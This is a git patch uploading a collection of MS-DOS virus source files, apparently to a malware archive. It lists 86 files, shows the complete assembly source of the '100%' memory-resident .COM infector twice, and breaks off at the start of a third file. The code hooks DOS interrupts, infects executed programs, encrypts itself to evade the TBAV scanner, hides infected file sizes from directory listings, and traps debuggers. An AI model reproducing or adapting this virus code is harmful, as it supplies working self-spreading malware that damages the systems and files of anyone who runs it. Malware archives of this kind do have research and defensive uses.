From 039994e413cd99cc08a46fbdc070ea62dcddbcaa Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 17:29:01 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.100%-1.asm | 412 +++ MSDOS/Virus.MSDOS.Unknown.100%.asm | 412 +++ MSDOS/Virus.MSDOS.Unknown.1200.asm | 317 ++ MSDOS/Virus.MSDOS.Unknown.133.asm | 99 + MSDOS/Virus.MSDOS.Unknown.1575-e.asm | 983 ++++++ MSDOS/Virus.MSDOS.Unknown.1575.asm | 947 ++++++ MSDOS/Virus.MSDOS.Unknown.15apr.asm | 679 ++++ MSDOS/Virus.MSDOS.Unknown.1701-b.asm | 424 +++ MSDOS/Virus.MSDOS.Unknown.1701.asm | 427 +++ MSDOS/Virus.MSDOS.Unknown.1704.asm | 919 ++++++ MSDOS/Virus.MSDOS.Unknown.1717.asm | 664 ++++ MSDOS/Virus.MSDOS.Unknown.1888.asm | 1923 +++++++++++ MSDOS/Virus.MSDOS.Unknown.189.asm | 152 + MSDOS/Virus.MSDOS.Unknown.196.asm | 152 + MSDOS/Virus.MSDOS.Unknown.1963.asm | 1292 ++++++++ MSDOS/Virus.MSDOS.Unknown.1992.asm | 925 ++++++ MSDOS/Virus.MSDOS.Unknown.1st_star.asm | 161 + MSDOS/Virus.MSDOS.Unknown.1stvirus.asm | 165 + MSDOS/Virus.MSDOS.Unknown.203.asm | 187 ++ MSDOS/Virus.MSDOS.Unknown.23.asm | 37 + MSDOS/Virus.MSDOS.Unknown.25.asm | 30 + MSDOS/Virus.MSDOS.Unknown.299.asm | 150 + MSDOS/Virus.MSDOS.Unknown.29bytes.asm | 35 + MSDOS/Virus.MSDOS.Unknown.30.asm | 26 + MSDOS/Virus.MSDOS.Unknown.3066.asm | 1491 +++++++++ MSDOS/Virus.MSDOS.Unknown.334.asm | 252 ++ MSDOS/Virus.MSDOS.Unknown.382.asm | 243 ++ MSDOS/Virus.MSDOS.Unknown.386sx16.asm | 454 +++ MSDOS/Virus.MSDOS.Unknown.3apa3a.asm | 520 +++ MSDOS/Virus.MSDOS.Unknown.405.asm | 177 ++ MSDOS/Virus.MSDOS.Unknown.405_.asm | 206 ++ MSDOS/Virus.MSDOS.Unknown.4096.asm | 1902 +++++++++++ MSDOS/Virus.MSDOS.Unknown.43.asm | 37 + MSDOS/Virus.MSDOS.Unknown.44.asm | 99 + MSDOS/Virus.MSDOS.Unknown.468.asm | 257 ++ MSDOS/Virus.MSDOS.Unknown.50.asm | 33 + MSDOS/Virus.MSDOS.Unknown.512-x.asm | 304 ++ MSDOS/Virus.MSDOS.Unknown.512.asm | 269 ++ MSDOS/Virus.MSDOS.Unknown.541.asm | 446 +++ MSDOS/Virus.MSDOS.Unknown.560.asm | 464 +++ MSDOS/Virus.MSDOS.Unknown.583virus.asm | 324 ++ MSDOS/Virus.MSDOS.Unknown.7son.asm | 251 ++ MSDOS/Virus.MSDOS.Unknown.7son2.asm | 232 ++ MSDOS/Virus.MSDOS.Unknown.7son4.asm | 218 ++ MSDOS/Virus.MSDOS.Unknown.808.asm | 306 ++ MSDOS/Virus.MSDOS.Unknown.80hex.asm | 87 + MSDOS/Virus.MSDOS.Unknown.90210.asm | 377 +++ MSDOS/Virus.MSDOS.Unknown.911.asm | 631 ++++ MSDOS/Virus.MSDOS.Unknown._468.asm | 257 ++ MSDOS/Virus.MSDOS.Unknown.abdo.asm | 180 ++ MSDOS/Virus.MSDOS.Unknown.acidtrip.asm | 459 +++ MSDOS/Virus.MSDOS.Unknown.acme.asm | 300 ++ MSDOS/Virus.MSDOS.Unknown.acurev.asm | 165 + MSDOS/Virus.MSDOS.Unknown.addict1.asm | 191 ++ MSDOS/Virus.MSDOS.Unknown.addict2.asm | 251 ++ MSDOS/Virus.MSDOS.Unknown.addict3.asm | 265 ++ MSDOS/Virus.MSDOS.Unknown.addict4.asm | 224 ++ MSDOS/Virus.MSDOS.Unknown.addict5.asm | 530 ++++ MSDOS/Virus.MSDOS.Unknown.addict6.asm | 612 ++++ MSDOS/Virus.MSDOS.Unknown.addict7.asm | 813 +++++ MSDOS/Virus.MSDOS.Unknown.addict8.asm | 793 +++++ MSDOS/Virus.MSDOS.Unknown.addict9.asm | 743 +++++ MSDOS/Virus.MSDOS.Unknown.adrian.asm | 474 +++ MSDOS/Virus.MSDOS.Unknown.afrca109.asm | 99 + MSDOS/Virus.MSDOS.Unknown.ag.asm | 367 +++ MSDOS/Virus.MSDOS.Unknown.agiplan.asm | 1003 ++++++ MSDOS/Virus.MSDOS.Unknown.ah.asm | 415 +++ MSDOS/Virus.MSDOS.Unknown.ahadisk.asm | 4042 ++++++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.aid(s).asm | 542 ++++ MSDOS/Virus.MSDOS.Unknown.aids.pas | 302 ++ MSDOS/Virus.MSDOS.Unknown.aircop.asm | 467 +++ MSDOS/Virus.MSDOS.Unknown.alameda.asm | 381 +++ MSDOS/Virus.MSDOS.Unknown.alchemy.asm | 1039 ++++++ MSDOS/Virus.MSDOS.Unknown.alemeda.asm | 381 +++ MSDOS/Virus.MSDOS.Unknown.alpha.asm | 890 ++++++ MSDOS/Virus.MSDOS.Unknown.altar.asm | 534 ++++ MSDOS/Virus.MSDOS.Unknown.ambul.asm | 523 +++ MSDOS/Virus.MSDOS.Unknown.ambul3.asm | 390 +++ MSDOS/Virus.MSDOS.Unknown.ambulanc.asm | 479 +++ MSDOS/Virus.MSDOS.Unknown.amst-299.asm | 133 + MSDOS/Virus.MSDOS.Unknown.amst-345.asm | 134 + MSDOS/Virus.MSDOS.Unknown.amst-740.asm | 128 + MSDOS/Virus.MSDOS.Unknown.amst-847.asm | 150 + MSDOS/Virus.MSDOS.Unknown.amst-852.asm | 155 + MSDOS/Virus.MSDOS.Unknown.andropin.asm | 408 +++ MSDOS/Virus.MSDOS.Unknown.angela.asm | 841 +++++ 86 files changed, 41158 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.100%-1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.100%.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1200.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.133.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1575-e.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1575.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.15apr.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1701-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1701.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1704.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1717.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1888.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.189.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.196.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1963.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1992.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1st_star.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1stvirus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.203.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.23.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.25.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.299.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.29bytes.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.30.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.3066.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.334.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.382.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.386sx16.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.3apa3a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.405.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.405_.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.4096.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.43.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.44.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.468.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.50.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.512-x.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.512.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.541.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.560.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.583virus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.7son.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.7son2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.7son4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.808.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.80hex.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.90210.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.911.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown._468.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.abdo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.acidtrip.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.acme.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.acurev.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict5.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict6.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict7.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict8.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict9.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.adrian.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.afrca109.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ag.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.agiplan.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ah.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ahadisk.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.aid(s).asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.aids.pas create mode 100644 MSDOS/Virus.MSDOS.Unknown.aircop.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alameda.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alchemy.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alemeda.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alpha.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.altar.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ambul.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ambul3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ambulanc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-299.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-345.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-740.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-847.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-852.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.andropin.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.angela.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.100%-1.asm b/MSDOS/Virus.MSDOS.Unknown.100%-1.asm new file mode 100644 index 00000000..8115778f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.100%-1.asm @@ -0,0 +1,412 @@ +; =======================================================================> +; 100% By MnemoniX - 1994 +; +; This is a memory resident .COM infector which hides itself using +; directory stealth (11/12 and 4E/4F). To avoid setting heuristic +; flags in TBAV, it overwrites part of the decryption routine with +; garbage and adds instructions to repair it on the header of the +; program. Runs through TBAV flawlessly. Examine it in action and +; observe for yourself. +; +; This virus also includes debugger traps to thwart tracing. +; =======================================================================> + +PING equ 30F4h ; give INT 21 this value ... +PONG equ 0DEADh ; if this returns we're res. +ID equ '%0' ; ID marker +HEADER_SIZE equ 22 ; 22 - byte .COM header +MARKER equ 20 ; marker at offset 20 + +code segment byte public 'code' + org 100h + assume cs:code + +start: + db 17 dup (90h) ; simulate infected program + jmp virus_begin ; a real host program will + dw ID ; have some MOVs at the +host: + db 0CDh,20h ; beginning + db 20 dup(90h) + +virus_begin: + db 0BBh ; mov bx,offset viral_code +code_offset dw offset virus_code + db 0B8h ; mov ax,cipher +cipher dw 0 + mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code +decrypt: + xor [bx],ax ; in real infections, + ror ax,1 ; portions of this code + inc bx ; will be replaced with + inc bx ; dummy bytes, which will be + loop decrypt ; fixed up by the header. + ; this complicates scanning +virus_code: + call $+3 ; BP is instruction pointer + pop bp + sub bp,offset $-1 + + xor ax,ax ; anti-trace ... + mov es,ax ; set interrupts 0-3 to point + mov di,ax ; to The Great Void in high + dec ax ; memory ... + mov cl,8 + rep movsw + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + in al,21h ; another anti-debugger + xor al,2 ; routine ... lock out + out 21h,al ; keyboard + xor al,2 + out 21h,al + + mov ax,ds ; not resident - install + dec ax ; ourselves in memory + mov ds,ax + + sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1 + sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1 + mov ax,ds:[12h] + mov ds,ax + + sub ax,15 + mov es,ax + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],8 + mov word ptr ds:[3],(MEM_SIZE + 15) / 16 + + push cs ; now move virus into memory + pop ds + mov di,100h + mov cx,(offset virus_end - offset start) / 2 + lea si,[bp + offset start] + rep movsw + + xor ax,ax ; change interrupt 21 to point + mov ds,ax ; to ourselves + + mov si,21h * 4 + mov di,offset old_int_21 ; (saving original int 21) + movsw + movsw + + mov word ptr ds:[si - 2],0 ; anti-trace - temporarily + ; kill int 21 + mov ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es + +installed: + push cs ; restore segregs + push cs + pop ds + pop es + lea si,[bp + offset host] ; and restore original + mov di,100h ; bytes of program + push di + mov cx,HEADER_SIZE + rep movsb + + ret ; and we're done + +; Interrupt 21 handler - trap file execute, search, open, read, and +; moves to the end of the file. + +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,30F4h ; residency test? + je test_pass ; yes .... + + cmp ax,4B00h ; file execute? + jne stealth + jmp execute ; yes, infect ... + +stealth: + cmp ah,11h ; directory stealth + je dir_stealth_1 + cmp ah,12h + je dir_stealth_1 + + cmp ah,4Eh ; more directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +test_pass: + call int_21 ; get real DOS version + mov bx,PONG ; and give pass signal + iret + +dir_stealth_1: + call int_21 ; perform directory search + cmp al,-1 ; no more files? + jne check_file + iret ; no, skip it +check_file: + push ax bx es ; check file for infection + + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 + +no_ext_FCB: + cmp word ptr es:[bx + 9],'OC' + jne fixed ; not .COM file, ignore + + mov ax,word ptr es:[bx + 17h] + and al,31 ; check seconds - + cmp al,26 ; if 52, infected + jne fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Fh],0 +fixed: + pop es bx ax + iret + +dir_stealth_2: + call int_21 ; perform file search + jnc check_file_2 ; if found, proceed + retf 2 ; nope, leave +check_file_2: + push ax bx si es + + mov ah,2Fh ; find DTA + int 21h + + xor si,si ; verify that this is a .COM +find_ext: + cmp byte ptr es:[bx + si],'.' + je found_ext + inc si + jmp find_ext +found_ext: + cmp word ptr es:[bx + si + 1],'OC' + jne fixed_2 ; if not .COM, skip + + mov ax,word ptr es:[bx + 16h] + and al,31 ; check for infection marker + cmp al,26 + jne fixed_2 ; not found, skip + + sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Ch],0 +fixed_2: + pop es si bx ax ; done + clc + retf 2 + +execute: + push ax bx cx dx di ds es ; file execute ... check + ; if uninfected .COM file, + mov ax,3D00h ; and if so, infect + call int_21 + jnc read_header + jmp exec_exit ; can't open, leave + +read_header: + xchg ax,bx + + push bx ; save file handle + mov ax,1220h ; get system file table + int 2Fh ; entry + + nop ; remove this if you don't + ; mind scanning as [512] under + ; SCAN ... + + mov bl,es:[di] ; get number of the SFT + mov ax,1216h ; for this handle + int 2Fh ; ES:DI now points to SFT + pop bx + + mov word ptr es:[di + 2],2 ; change open mode to R/W + + push word ptr es:[di + 13] ; save file date + push word ptr es:[di + 15] ; and file time + + mov ax,word ptr es:[di + 11h] + cmp ax,62579 - VIRUS_SIZE ; too big? + je exec_close + + cmp ax,22 ; too small? + jb exec_close + + add ax,HEADER_SIZE - 3 ; calculate virus offset + + + push cs + pop ds + + mov ds:virus_offset,ax + + mov ah,3Fh ; read header of file + mov cx,HEADER_SIZE ; to check for infection + mov dx,offset read_buffer + call int_21 + + cmp word ptr ds:read_buffer,'ZM' + je exec_close ; don't infect .EXE + + cmp word ptr ds:read_buffer[MARKER],ID ; if infected + je exec_close ; already, skip it + + mov ax,4202h ; move to end of file + call move_ptr_write + + mov dx,offset read_buffer ; and save header + call int_21 + + call encrypt_code ; encrypt the virus code + call create_header ; and create unique header + + mov ah,40h + mov cx,VIRUS_SIZE ; write virus code to file + mov dx,offset encrypt_buffer + int 21h + + mov ax,4200h ; back to beginning of file + call move_ptr_write + + mov dx,offset new_header ; write new header + call int_21 + + pop dx ; restore file date & time + pop cx + and cl,0E0h ; but with timestamp + or cl,26 + mov ax,5701h + int 21h + + mov ah,3Eh ; close file + int 21h + +exec_exit: + pop es ds di dx cx bx ax + jmp int_21_exit + +move_ptr_write: + cwd ; move file pointer + xor cx,cx + int 21h + mov cx,HEADER_SIZE ; and prepare for write + mov ah,40h ; to file + ret + +exec_close: + pop ax ax ; clean off stack + mov ah,3Eh ; and close + int 21h + jmp exec_exit + +encrypt_code proc near + + push si es + + push cs + pop es + + xor ah,ah ; get random no. + int 1Ah ; and store in decryption + mov cipher,dx ; module + + mov ax,ds:virus_offset + add ax,DECRYPTOR_SIZE + 103h + mov code_offset,ax + + mov si,offset virus_begin ; first store header + mov di,offset encrypt_buffer + mov cx,DECRYPTOR_SIZE + rep movsb ; (unencryted) + + mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code + +encrypt: + lodsw ; simple encryption routine + xor ax,dx + ror dx,1 + stosw + loop encrypt + + pop es si + ret + +encrypt_code endp + +create_header proc near + + mov ax,ds:virus_offset ; fix up addresses in new + add ax,103h + (offset decrypt - offset virus_begin) + mov ds:mov_1,ax ; header + inc ax + inc ax + mov ds:mov_2,ax + + xor ah,ah ; fill in useless MOVs + int 1Ah ; with random bytes + mov ds:mov_al,cl + mov ds:mov_ax,dx + + push es cs + pop es + mov di,offset encrypt_buffer + add di,offset decrypt - offset virus_begin + mov ax,dx ; now fill decryption module + neg ax ; with some garbage + stosw + rol ax,1 + stosw + pop es + + sub word ptr ds:virus_offset,17 ; fix up JMP instruction + + ret ; done +create_header endp + +new_header db 0C7h,06 +mov_1 dw 00 + db 31h,07 ; first MOV 6 + db 0B0h +mov_al db 00 ; a nothing MOV AL, 2 + db 0C7h,06 +mov_2 dw 00 + db 0D1h,0C8h ; second MOV 6 + db 0B8h +mov_ax dw 00 ; a nothing MOV AX, 3 + db 0E9h ; jump instruction 1 +virus_offset dw 0 ; virus offset 2 + dw ID ; ID marker 2 + ; total bytes = 22 + +sig db '[100%] By MnemoniX 1994',0 + +virus_end: + +VIRUS_SIZE equ offset virus_end - offset virus_begin + +read_buffer dw HEADER_SIZE dup (?) ; storage for orig header +encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus + +heap_end: + +MEM_SIZE equ offset heap_end - offset start +DECRYPTOR_SIZE equ offset virus_code - offset virus_begin +ENCRYPTED_SIZE equ offset virus_end - offset virus_code + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.100%.asm b/MSDOS/Virus.MSDOS.Unknown.100%.asm new file mode 100644 index 00000000..8115778f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.100%.asm @@ -0,0 +1,412 @@ +; =======================================================================> +; 100% By MnemoniX - 1994 +; +; This is a memory resident .COM infector which hides itself using +; directory stealth (11/12 and 4E/4F). To avoid setting heuristic +; flags in TBAV, it overwrites part of the decryption routine with +; garbage and adds instructions to repair it on the header of the +; program. Runs through TBAV flawlessly. Examine it in action and +; observe for yourself. +; +; This virus also includes debugger traps to thwart tracing. +; =======================================================================> + +PING equ 30F4h ; give INT 21 this value ... +PONG equ 0DEADh ; if this returns we're res. +ID equ '%0' ; ID marker +HEADER_SIZE equ 22 ; 22 - byte .COM header +MARKER equ 20 ; marker at offset 20 + +code segment byte public 'code' + org 100h + assume cs:code + +start: + db 17 dup (90h) ; simulate infected program + jmp virus_begin ; a real host program will + dw ID ; have some MOVs at the +host: + db 0CDh,20h ; beginning + db 20 dup(90h) + +virus_begin: + db 0BBh ; mov bx,offset viral_code +code_offset dw offset virus_code + db 0B8h ; mov ax,cipher +cipher dw 0 + mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code +decrypt: + xor [bx],ax ; in real infections, + ror ax,1 ; portions of this code + inc bx ; will be replaced with + inc bx ; dummy bytes, which will be + loop decrypt ; fixed up by the header. + ; this complicates scanning +virus_code: + call $+3 ; BP is instruction pointer + pop bp + sub bp,offset $-1 + + xor ax,ax ; anti-trace ... + mov es,ax ; set interrupts 0-3 to point + mov di,ax ; to The Great Void in high + dec ax ; memory ... + mov cl,8 + rep movsw + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + in al,21h ; another anti-debugger + xor al,2 ; routine ... lock out + out 21h,al ; keyboard + xor al,2 + out 21h,al + + mov ax,ds ; not resident - install + dec ax ; ourselves in memory + mov ds,ax + + sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1 + sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1 + mov ax,ds:[12h] + mov ds,ax + + sub ax,15 + mov es,ax + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],8 + mov word ptr ds:[3],(MEM_SIZE + 15) / 16 + + push cs ; now move virus into memory + pop ds + mov di,100h + mov cx,(offset virus_end - offset start) / 2 + lea si,[bp + offset start] + rep movsw + + xor ax,ax ; change interrupt 21 to point + mov ds,ax ; to ourselves + + mov si,21h * 4 + mov di,offset old_int_21 ; (saving original int 21) + movsw + movsw + + mov word ptr ds:[si - 2],0 ; anti-trace - temporarily + ; kill int 21 + mov ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es + +installed: + push cs ; restore segregs + push cs + pop ds + pop es + lea si,[bp + offset host] ; and restore original + mov di,100h ; bytes of program + push di + mov cx,HEADER_SIZE + rep movsb + + ret ; and we're done + +; Interrupt 21 handler - trap file execute, search, open, read, and +; moves to the end of the file. + +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,30F4h ; residency test? + je test_pass ; yes .... + + cmp ax,4B00h ; file execute? + jne stealth + jmp execute ; yes, infect ... + +stealth: + cmp ah,11h ; directory stealth + je dir_stealth_1 + cmp ah,12h + je dir_stealth_1 + + cmp ah,4Eh ; more directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +test_pass: + call int_21 ; get real DOS version + mov bx,PONG ; and give pass signal + iret + +dir_stealth_1: + call int_21 ; perform directory search + cmp al,-1 ; no more files? + jne check_file + iret ; no, skip it +check_file: + push ax bx es ; check file for infection + + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 + +no_ext_FCB: + cmp word ptr es:[bx + 9],'OC' + jne fixed ; not .COM file, ignore + + mov ax,word ptr es:[bx + 17h] + and al,31 ; check seconds - + cmp al,26 ; if 52, infected + jne fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Fh],0 +fixed: + pop es bx ax + iret + +dir_stealth_2: + call int_21 ; perform file search + jnc check_file_2 ; if found, proceed + retf 2 ; nope, leave +check_file_2: + push ax bx si es + + mov ah,2Fh ; find DTA + int 21h + + xor si,si ; verify that this is a .COM +find_ext: + cmp byte ptr es:[bx + si],'.' + je found_ext + inc si + jmp find_ext +found_ext: + cmp word ptr es:[bx + si + 1],'OC' + jne fixed_2 ; if not .COM, skip + + mov ax,word ptr es:[bx + 16h] + and al,31 ; check for infection marker + cmp al,26 + jne fixed_2 ; not found, skip + + sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Ch],0 +fixed_2: + pop es si bx ax ; done + clc + retf 2 + +execute: + push ax bx cx dx di ds es ; file execute ... check + ; if uninfected .COM file, + mov ax,3D00h ; and if so, infect + call int_21 + jnc read_header + jmp exec_exit ; can't open, leave + +read_header: + xchg ax,bx + + push bx ; save file handle + mov ax,1220h ; get system file table + int 2Fh ; entry + + nop ; remove this if you don't + ; mind scanning as [512] under + ; SCAN ... + + mov bl,es:[di] ; get number of the SFT + mov ax,1216h ; for this handle + int 2Fh ; ES:DI now points to SFT + pop bx + + mov word ptr es:[di + 2],2 ; change open mode to R/W + + push word ptr es:[di + 13] ; save file date + push word ptr es:[di + 15] ; and file time + + mov ax,word ptr es:[di + 11h] + cmp ax,62579 - VIRUS_SIZE ; too big? + je exec_close + + cmp ax,22 ; too small? + jb exec_close + + add ax,HEADER_SIZE - 3 ; calculate virus offset + + + push cs + pop ds + + mov ds:virus_offset,ax + + mov ah,3Fh ; read header of file + mov cx,HEADER_SIZE ; to check for infection + mov dx,offset read_buffer + call int_21 + + cmp word ptr ds:read_buffer,'ZM' + je exec_close ; don't infect .EXE + + cmp word ptr ds:read_buffer[MARKER],ID ; if infected + je exec_close ; already, skip it + + mov ax,4202h ; move to end of file + call move_ptr_write + + mov dx,offset read_buffer ; and save header + call int_21 + + call encrypt_code ; encrypt the virus code + call create_header ; and create unique header + + mov ah,40h + mov cx,VIRUS_SIZE ; write virus code to file + mov dx,offset encrypt_buffer + int 21h + + mov ax,4200h ; back to beginning of file + call move_ptr_write + + mov dx,offset new_header ; write new header + call int_21 + + pop dx ; restore file date & time + pop cx + and cl,0E0h ; but with timestamp + or cl,26 + mov ax,5701h + int 21h + + mov ah,3Eh ; close file + int 21h + +exec_exit: + pop es ds di dx cx bx ax + jmp int_21_exit + +move_ptr_write: + cwd ; move file pointer + xor cx,cx + int 21h + mov cx,HEADER_SIZE ; and prepare for write + mov ah,40h ; to file + ret + +exec_close: + pop ax ax ; clean off stack + mov ah,3Eh ; and close + int 21h + jmp exec_exit + +encrypt_code proc near + + push si es + + push cs + pop es + + xor ah,ah ; get random no. + int 1Ah ; and store in decryption + mov cipher,dx ; module + + mov ax,ds:virus_offset + add ax,DECRYPTOR_SIZE + 103h + mov code_offset,ax + + mov si,offset virus_begin ; first store header + mov di,offset encrypt_buffer + mov cx,DECRYPTOR_SIZE + rep movsb ; (unencryted) + + mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code + +encrypt: + lodsw ; simple encryption routine + xor ax,dx + ror dx,1 + stosw + loop encrypt + + pop es si + ret + +encrypt_code endp + +create_header proc near + + mov ax,ds:virus_offset ; fix up addresses in new + add ax,103h + (offset decrypt - offset virus_begin) + mov ds:mov_1,ax ; header + inc ax + inc ax + mov ds:mov_2,ax + + xor ah,ah ; fill in useless MOVs + int 1Ah ; with random bytes + mov ds:mov_al,cl + mov ds:mov_ax,dx + + push es cs + pop es + mov di,offset encrypt_buffer + add di,offset decrypt - offset virus_begin + mov ax,dx ; now fill decryption module + neg ax ; with some garbage + stosw + rol ax,1 + stosw + pop es + + sub word ptr ds:virus_offset,17 ; fix up JMP instruction + + ret ; done +create_header endp + +new_header db 0C7h,06 +mov_1 dw 00 + db 31h,07 ; first MOV 6 + db 0B0h +mov_al db 00 ; a nothing MOV AL, 2 + db 0C7h,06 +mov_2 dw 00 + db 0D1h,0C8h ; second MOV 6 + db 0B8h +mov_ax dw 00 ; a nothing MOV AX, 3 + db 0E9h ; jump instruction 1 +virus_offset dw 0 ; virus offset 2 + dw ID ; ID marker 2 + ; total bytes = 22 + +sig db '[100%] By MnemoniX 1994',0 + +virus_end: + +VIRUS_SIZE equ offset virus_end - offset virus_begin + +read_buffer dw HEADER_SIZE dup (?) ; storage for orig header +encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus + +heap_end: + +MEM_SIZE equ offset heap_end - offset start +DECRYPTOR_SIZE equ offset virus_code - offset virus_begin +ENCRYPTED_SIZE equ offset virus_end - offset virus_code + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1200.asm b/MSDOS/Virus.MSDOS.Unknown.1200.asm new file mode 100644 index 00000000..bca946d5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1200.asm @@ -0,0 +1,317 @@ 